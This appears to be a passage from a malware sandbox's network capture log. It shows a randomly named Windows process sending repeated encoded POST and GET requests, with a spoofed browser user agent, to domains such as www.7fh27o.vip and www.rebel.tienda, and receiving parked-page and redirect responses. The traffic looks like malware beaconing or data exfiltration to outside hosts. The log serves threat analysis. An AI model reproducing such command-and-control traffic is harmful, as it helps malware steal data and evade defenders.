Oct 31, 2024 10:27:12.975718021 CET	730	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 39 4a 4f 72 66 69 78 35 72 50 4c 45 64 4d 4a 39 7a 59 50 78 73 51 44 47 7a 68 36 57 30 46 68 64 50 36 67 45 2b 50 77 46 42 4e 4a 71 67 4a 78 62 66 75 4e 41 7a 77 59 4e 66 56 53 55 50 4d 7a 57 46 6b 34 67 68 79 6b 67 78 51 43 78 59 4d 76 53 4a 75 67 78 4b 66 46 55 77 64 76 44 4d 35 4f 71 32 65 55 59 59 6a 52 37 64 64 36 73 4d 35 76 56 7a 6a 53 42 75 44 4f 72 2b 55 72 4e 50 59 30 6c 46 69 6e 35 70 4f 4f 42 56 50 46 73 68 45 6e 69 62 54 45 6e 7a 5a 4f 38 4f 69 6d 45 38 41 31 56 47 4b 74 35 54 46 34 64 65 38 55 71 51 69 62 57 34 33 Data Ascii: 1Zgl=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM9JOrfix5rPLEdMJ9zYPxsQDGzh6W0FhdP6gE+PwFBNJqgJxbfuNAzwYNfVSUPMzWFk4ghykgxQCxYMvSJugxKfFUwdvDM5Oq2eUYYjR7dd6sM5vVzjSBuDOr+UrNPY0lFin5pOOBVPFshEnibTEnzZO8OimE8A1VGKt5TF4de8UqQibW43

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50009	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:15.525587082 CET	1747	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 31 4a 53 4a 6e 69 78 65 2f 50 49 45 64 4d 4b 39 7a 6a 50 78 73 52 44 47 4b 71 36 57 35 79 68 62 44 36 79 33 32 50 33 77 68 4e 51 36 67 4a 39 37 66 76 44 67 79 34 59 4e 50 76 53 55 2f 4d 7a 57 46 6b 34 69 35 79 79 42 78 51 41 78 59 50 35 43 4a 71 7a 68 4b 37 46 55 70 2f 76 44 4a 43 4f 63 47 65 58 38 30 6a 43 5a 31 64 6e 63 4d 33 73 56 7a 72 53 42 69 63 4f 72 79 69 72 4d 37 2b 30 6e 46 69 6b 2b 73 44 65 79 4e 77 59 63 5a 36 6c 6c 44 65 61 48 37 41 4e 61 47 6d 73 6b 41 30 70 32 72 6a 71 65 50 2f 2b 76 4c 53 47 65 63 49 63 52 31 58 76 42 65 59 62 34 5a 74 57 38 69 34 38 62 4b 56 79 6c 77 34 4c 49 30 2f 37 59 6b 59 7a 33 54 35 58 32 2b 30 54 59 6c 68 72 6f 75 48 55 6d 76 4e 4a 4c 66 65 55 72 54 4d 34 66 6f 6c 6a 4f 56 30 33 42 6d 2f 57 79 38 2b 46 46 75 63 79 51 7a 45 64 71 71 51 51 5a 68 65 31 47 6b 70 4e 34 61 71 65 4b 4d 2f 6f 74 2b 70 52 36 63 69 64 59 72 77 52 [TRUNCATED] Data Ascii: 1Zgl=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM1JSJnixe/PIEdMK9zjPxsRDGKq6W5yhbD6y32P3whNQ6gJ97fvDgy4YNPvSU/MzWFk4i5yyBxQAxYP5CJqzhK7FUp/vDJCOcGeX80jCZ1dncM3sVzrSBicOryirM7+0nFik+sDeyNwYcZ6llDeaH7ANaGmskA0p2rjqeP/+vLSGecIcR1XvBeYb4ZtW8i48bKVylw4LI0/7YkYz3T5X2+0TYlhrouHUmvNJLfeUrTM4foljOV03Bm/Wy8+FFucyQzEdqqQQZhe1GkpN4aqeKM/ot+pR6cidYrwRH4wfpQA3yiIUVPUSbdoSp25+zN34jLkw+fteDrvEjJkqUhYPkAN1V0VgPJ6Z+OWMLGB20Ir3DRAYf9u6Sri++IBcBRSzyt7hpKKI7aq7QaDPKqp4x/v0kPl1g+zs1hhFdxbMqxH0kNanLruN4C/uOEy3bFYz0/atMRbS4sn9bYQs9oaEtfOOFT40WmGHfCCeaG697jsOB7zkoBKXix+1GEYbygRe7dcDrv7hmk+hyp0wtQvaFvixT6FkN7P2w35w+xmeI5tHMsV2Hb6mTKOmvEbzmlANh6/gQLplb9ZdzFjrc4341nNuaK7yVZ2L/VoircBmsn7/mXELDaQ7inkCFqAmQzArnRrdUl45KrzVwxbcQlp8W+pCisEaFzLQwTUGOhC/bcPvam6S7CyTvsrLyiuf/sQH6/yVqDyXyDs7RB4P4yVr++OVEgsmi8YEZ2QdqruAem4R54sYZparlyWr+UQEb4IsxuS1S1WnRFyt6sRfNjfdOYQhioUKmpHOXpxbtdqDSV/R7Fj7V70giqtpcLITU7zqm7eDZBLJq5MA5HHLpC2CCksHVe1P17Xy9MT1FE7aL/7x8VCZQV0Yf+w72IWGBKziatdvmKQJJJ/KoNRlNWvqmIR1InKHJVSVELLg4Uduhfv8tmAroLinzXnQ3f6bblAeYyfMmV [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50010	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:18.068876028 CET	455	OUT	GET /l5ty/?1Zgl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.7fh27o.vip User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:27:25.910413027 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 31 Oct 2024 09:27:25 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 67 6c 3d 71 2b 4f 59 5a 41 6a 65 35 54 47 47 50 78 72 68 32 66 34 75 64 76 7a 65 57 41 45 71 47 61 35 74 6c 66 67 67 2b 4b 6d 50 63 2f 35 4a 64 5a 33 2b 30 36 4c 42 66 30 39 4e 42 35 50 65 5a 43 52 4d 66 41 33 52 77 6d 74 33 70 4e 33 4b 6e 48 58 67 2f 42 4e 41 59 72 34 32 36 59 6e 4d 4a 41 79 34 59 2f 50 43 47 46 4b 30 33 52 70 78 70 69 31 33 78 7a 30 79 44 69 68 65 73 47 31 72 69 69 33 68 63 51 3d 3d 26 77 36 3d 32 76 64 50 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1Zgl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&w6=2vdPP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50011	199.59.243.227	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:31.061582088 CET	716	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 59 77 68 53 72 2b 66 70 38 63 6a 73 4a 4d 64 39 65 50 74 65 69 31 4c 74 66 62 62 56 30 30 67 44 6e 62 76 63 57 45 68 50 7a 4a 78 33 49 43 76 46 5a 2f 51 5a 6c 5a 73 39 2f 52 32 35 70 50 5a 65 55 78 44 49 70 68 4c 66 50 46 74 78 32 34 78 77 2f 71 4b 4d 4d 36 46 2f 61 6f 4d 36 46 4d 46 32 4e 7a 46 44 6d 49 79 35 79 37 76 75 76 72 78 30 49 79 54 4f 6c 49 68 5a 50 50 74 77 43 6d 33 6e 79 31 71 31 57 51 51 55 4a 68 6f 51 34 74 65 72 36 54 7a 39 64 4c 79 4e 41 6b 50 58 36 75 6e 53 78 6c 76 4d 63 66 6c 6f 77 7a 74 56 74 76 74 4e 69 4f 66 45 43 4e 72 5a 2b 63 49 3d Data Ascii: 1Zgl=0NEXbjzg9WfMYwhSr+fp8cjsJMd9ePtei1LtfbbV00gDnbvcWEhPzJx3ICvFZ/QZlZs9/R25pPZeUxDIphLfPFtx24xw/qKMM6F/aoM6FMF2NzFDmIy5y7vuvrx0IyTOlIhZPPtwCm3ny1q1WQQUJhoQ4ter6Tz9dLyNAkPX6unSxlvMcflowztVtvtNiOfECNrZ+cI=
Oct 31, 2024 10:27:31.711374044 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 09:27:30 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 0913dec6-5047-440b-99a5-d2ba04466790 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=0913dec6-5047-440b-99a5-d2ba04466790; expires=Thu, 31 Oct 2024 09:42:31 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 10:27:31.711417913 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDkxM2RlYzYtNTA0Ny00NDBiLTk5YTUtZDJiYTA0NDY2NzkwIiwicGFnZV90aW1lIjoxNzMwMzY2OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50012	199.59.243.227	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:33.628266096 CET	736	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 4a 68 52 53 70 64 33 70 2b 38 6a 76 44 73 64 39 46 2f 74 61 69 79 44 74 66 61 76 46 30 47 45 44 6e 36 66 63 58 46 68 50 79 4a 78 33 44 69 76 4b 58 66 51 43 6c 5a 70 49 2f 52 36 35 70 4c 78 65 55 77 7a 49 70 57 66 65 65 46 74 33 2b 59 78 2b 67 36 4b 4d 4d 36 46 2f 61 6f 5a 58 46 4d 4e 32 4e 43 56 44 6e 70 79 36 38 62 76 76 6f 72 78 30 46 53 54 4b 6c 49 68 6e 50 4e 4a 4b 43 67 7a 6e 79 30 61 31 57 43 34 58 63 78 6f 61 6c 39 66 6a 70 53 4f 36 54 5a 6d 6c 49 43 36 52 73 2f 48 39 35 7a 65 6d 47 39 74 41 6a 54 42 74 39 38 6c 36 7a 2b 2b 74 59 75 37 70 67 4c 64 44 30 57 2f 4d 67 58 73 69 43 77 48 38 72 56 73 66 4c 58 63 37 Data Ascii: 1Zgl=0NEXbjzg9WfMJhRSpd3p+8jvDsd9F/taiyDtfavF0GEDn6fcXFhPyJx3DivKXfQClZpI/R65pLxeUwzIpWfeeFt3+Yx+g6KMM6F/aoZXFMN2NCVDnpy68bvvorx0FSTKlIhnPNJKCgzny0a1WC4Xcxoal9fjpSO6TZmlIC6Rs/H95zemG9tAjTBt98l6z++tYu7pgLdD0W/MgXsiCwH8rVsfLXc7
Oct 31, 2024 10:27:34.219610929 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 09:27:33 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 5c31fbc9-dd65-4e65-ba63-73563f3700b4 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=5c31fbc9-dd65-4e65-ba63-73563f3700b4; expires=Thu, 31 Oct 2024 09:42:34 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 10:27:34.219667912 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWMzMWZiYzktZGQ2NS00ZTY1LWJhNjMtNzM1NjNmMzcwMGI0IiwicGFnZV90aW1lIjoxNzMwMzY2OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50013	199.59.243.227	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:36.195671082 CET	1753	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 4a 68 52 53 70 64 33 70 2b 38 6a 76 44 73 64 39 46 2f 74 61 69 79 44 74 66 61 76 46 30 47 4d 44 6d 4a 48 63 56 6d 35 50 67 5a 78 33 4b 43 76 4a 58 66 52 61 6c 59 4e 54 2f 51 47 44 70 4e 31 65 58 53 4c 49 76 6a 7a 65 58 46 74 33 79 34 78 7a 2f 71 4b 6a 4d 36 56 7a 61 6f 4a 58 46 4d 4e 32 4e 42 39 44 32 34 79 36 73 72 76 75 76 72 78 77 49 79 54 79 6c 4a 4a 6f 50 4e 4d 6f 43 52 50 6e 38 33 69 31 62 52 51 58 42 42 6f 63 6d 39 66 53 70 53 43 31 54 5a 71 50 49 47 36 33 73 34 7a 39 6f 6e 7a 58 44 38 70 4a 2f 77 64 58 32 73 68 4b 75 2b 79 32 52 64 48 46 6f 72 52 44 77 58 62 45 33 77 67 65 58 7a 6d 43 70 78 4d 36 46 77 74 4f 53 36 30 56 4e 38 37 55 31 6f 32 59 74 73 6a 6d 4e 64 4e 45 4b 32 48 37 67 4c 55 79 73 38 44 74 46 30 55 41 4b 64 57 36 69 2f 47 63 31 2f 75 4b 62 51 4b 50 46 58 54 6d 52 4d 43 51 76 69 43 30 7a 45 6d 37 73 59 6f 7a 6b 44 56 78 54 6a 47 58 77 47 52 77 37 4e 4f 33 39 47 76 48 2f 4b 48 39 45 39 61 6b 44 6d 6a 66 45 6f 41 31 4e 59 6f 68 6b [TRUNCATED] Data Ascii: 1Zgl=0NEXbjzg9WfMJhRSpd3p+8jvDsd9F/taiyDtfavF0GMDmJHcVm5PgZx3KCvJXfRalYNT/QGDpN1eXSLIvjzeXFt3y4xz/qKjM6VzaoJXFMN2NB9D24y6srvuvrxwIyTylJJoPNMoCRPn83i1bRQXBBocm9fSpSC1TZqPIG63s4z9onzXD8pJ/wdX2shKu+y2RdHForRDwXbE3wgeXzmCpxM6FwtOS60VN87U1o2YtsjmNdNEK2H7gLUys8DtF0UAKdW6i/Gc1/uKbQKPFXTmRMCQviC0zEm7sYozkDVxTjGXwGRw7NO39GvH/KH9E9akDmjfEoA1NYohknzPn9UIC00HpGt61XSarwB5qjORtqgFt+TsSNv1+ClUwxIQkLQadZPelysTxX64oYRL1pZ6ukRYOwmQfec1kCX06+fsMDd0V56K5EzqG0FdjDymBS+j0jimA9FFJgvFFkn5pLrTVU2xMgS+LZVpyoEJywhOElEHN5XqS1enGudzXOCknCCy0YeP7ubHEFvUlgfzY/Gvr5dYb3H2UJpOzhbNlDXVYQBRk8aHn8FXs9Pa4qDYK0bcgWcZtKXLOEsrtDw8cho6vUs9z2BBh4CamHSrf7VIXdlKjcxuo7jJpk9v/mhz1G6ejBBRQEbIzncUkh6ir26KXVjllO99DeBq3oig8/wtgPPkHhruOvajRPxmirYL4cVsW9MvBY5zRaTwSpn7diQ0obnCilF69SopsoFAVVM+NHWMTgEIx4WIfD7TCrd32PcNh+BZ1br72C8p0EVkueA3+uvhjsV5vvD2sKXfPPoDfzEqzGic0ZQJRmNN5x1+TKsiwiog5PTVpJ5JwB0WHj8iO7V5T6TZJ1rfEP872RJaaRJcOLYALrv/sDs13EmlAR3Ru0s0ZZyeKIVscjCKCSOA7Xh57n79yR3ZHZ+30PrGGGaZXHCJcxiw2W2AXyvd2uSvotBvoJOBY672LD4B47xRFz3i6/95Pt3Y6+P3Oyf0OUAVcX7 [TRUNCATED]
Oct 31, 2024 10:27:36.803607941 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 09:27:35 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 46b63d06-55a8-48a6-bd4e-9227c4412bde cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=46b63d06-55a8-48a6-bd4e-9227c4412bde; expires=Thu, 31 Oct 2024 09:42:36 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
